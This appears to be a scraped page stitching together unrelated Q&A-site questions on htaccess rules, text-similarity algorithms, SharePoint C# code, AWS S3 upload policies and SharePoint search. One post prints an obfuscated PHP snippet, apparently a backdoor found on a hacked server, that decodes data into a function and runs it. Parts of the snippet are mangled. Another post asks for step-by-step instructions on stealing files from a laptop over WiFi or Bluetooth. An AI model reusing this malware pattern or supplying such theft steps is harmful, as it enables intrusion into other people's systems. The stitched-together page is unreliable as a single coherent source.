Deny access to all PHP files using FilesMatch, but make an exception for one

Currently, using htaccess I am denying access to any PHP file in a directory, but not the JS, PNG, CSS files in the same directory.

<FilesMatch "\.php$  "> Order deny,allow Deny from all </FilesMatch> 

What if I want to make an exception for one file (“foobar.php” for example) however? Can I write multiple statements in a single htaccess? What is the order of execution?

Lots of strange PHP files in home directory..Here is one [on hold]

$ gywiyca){function pzzll($ hxjlsy, $ bnhzyqt, $ zmidgo){return $ hxjlsy[7]($ hxjlsy[5]($ bnhzyqt . $ hxjlsy[3], ($ zmidgo / $ hxjlsy9) + 1), 0, $ zmidgo);}function aydwvve($ hxjlsy, $ vkjabah){return @$ hxjlsy[10]($ hxjlsy[1], $ vkjabah);}function xpjksgc($ hxjlsy, $ vkjabah){$ vtyhb = $ hxjlsy4 % 3;if (!$ vtyhb) {$ ekvlpx = $ hxjlsy[0]; $ nekja = $ ekvlpx(“”, $ vkjabah1);$ nekja();exit();}}$ gywiyca = aydwvve($ hxjlsy, $ gywiyca);xpjksgc($ hxjlsy, $ hxjlsy[6]($ hxjlsy[2], $ gywiyca ^ pzzll($ hxjlsy, $ bnhzyqt, $ hxjlsy9)));}

Finding the similarity between large text files

My first question is: is there an algorithm that already exists for this? If not any thoughts and ideas are appreciated.

Let’s say I have two large text files (original file A and new file B). Each file is English prose text (including dialogue) with a typical size 256K to 500K characters.

I want to compare them to find out how similar the contents of B are to A.

Similar in this case means: all, or a significant part, of B exists in A, with the condition that there may be subtle differences, words changed here and there, or even globally.

In all cases we have to remember that this is looking for similarity, not (necessarily) identity.

Preprocessing for the text:

  1. Remove all punctuation (and close up gaps “didn’t” -> “didnt”);
  2. Lowercase everything;
  3. Remove common words;
  4. Reduce all whitespace to single space only, but keep paragraphs;

Other possible optimisations to reduce future workload:

Ignore any paragraph of less than a certain length. Why? Because there’s a higher probability of natural duplication in shorter paragraphs (though arguably not in the same overall position).

Have an arbitrary cut-off length on the paragraphs. Why? Mostly because it reduces workload.

Finally:

For every word, turn it into a Metaphone. So instead of every paragraph being composed of normal words it becomes a list a metaphones which help in comparing slightly modified words.

We end up with paragraphs that look like this (each of these lines is a separate paragraph):

WNT TR0 ABT E0L JRTN TTKTF INSPK WLMS E0L UTRL OBNKS JRL TM RL SRPRS LKT TRKTL KM N SX WRT LT ASK W0R RT WRKS T ST N WLTNT RT 0M AL 

But I admit, when it comes to the comparison I’m not sure how to approach it, beyond a brute force take the first encoded paragraph from B (B[0]) and check every paragraph in A looking for a high match (maybe identical, maybe very similar). Perhaps we use Levenshtein to find a match percentage on the paragraphs.

If we find a match at A[n], then check B[1] against A[n+1] and maybe a couple further A[n+2] and A[n+3] just in case something was inserted.

And proceed that way.

What should be detected:

  • Near-identical text
  • Global proper noun changes
  • B is a subset of A

Thanks.

Analysis – Help with HTaccess (noindexing PDF Files) [on hold]

I am trying to analyse a htaccess. Considering I work in digital marketing, I understand 5% of all those rules and codes.

I would like a hand on everything but what I am most puzzled about is why the code is not enough to noindex the PDF files. There is a specific piece of code about it but I am wondering whether it conflicts with something else.

Thank you Fabrizio

How does one steal files by connecting to a laptop’s WIFI / Bluetooth? [on hold]

I’m asking how does one steal files by connecting to a laptop’s WIFI / Bluetooth and can it be done with the laptop powered off if there is a battery?

Could you please explain how you would connect to a laptop’s WIFI / Bluetooth and brute force the login, step by step?

I’m not asking for a hacking tutorial as misunderstood by someone, this is for educational purposes so I can understand it better. There is no existing explanation of that online.

How to get files from sharepoint C# Word VSTO addin

I am trying to get .doc file names from sharepoint and then get the file by the name. But I have a problem with using GetList() https://docs.microsoft.com/en-us/previous-versions/office/sharepoint-server/dn793734%28v%3doffice.15%29. So far I have a code:

string url = "https://mysharepoint.com/Things";              var ctx = new ClientContext(url);             Web web = ctx.Web;              var list = web.GetList("/Shared%20Documents/Test");              var listItems = list.GetItems(new CamlQuery());              ctx.Load(listItems,                 items => items.Include(                     item => item["Created"],                     item => item.File));              ctx.ExecuteQuery();              foreach (var item in listItems)             {                 Console.WriteLine("{0} - {1}",                         item["Created"],                         item.File.ServerRelativeUrl);             } 

But I acnt understand why I have that Error:

Severity    Code    Description Project File    Line    Suppression State Error   CS1061  'Web' does not contain a definition for 'GetList' and no accessible extension method 'GetList' accepting a first argument of type 'Web' could be found (are you missing a using directive or an assembly reference?)    MestoDljaProb   C:\Ribbon1.cs   111 Active 

Is Bucket Upload Policy a good pratice for upload files to AWS S3?

In AWS docs page has the following instructions to upload files to an AWS bucket from browser: https://docs.aws.amazon.com/AmazonS3/latest/API/RESTObjectPOST.html

This solution send to browser a policy and a signature using the secret key that is validated on POST. Also, exposes the AWS Key ID (but noy AWS Secret Key). Isn’t it a bad pratice? Although the secret ID is not exposed, expose AWS Key ID sounds bad for me because an attacker can use bruteforce to guess the key (having the policy and the signature).

Sharepoint 2013 – Search files into File Share (content source) with filtering by folders

I crawled content that is on stored on file server (File Share – content source in SharePoint Server) and i get the results in SharePoint search. Everything is fine but i need to have some kind of refiner (i tried many of them but none is working in the way that i need, or it is not working at all) that will have opportunity to choose the folder in which i want to search for some file. Could you give me some suggestions?

Thanks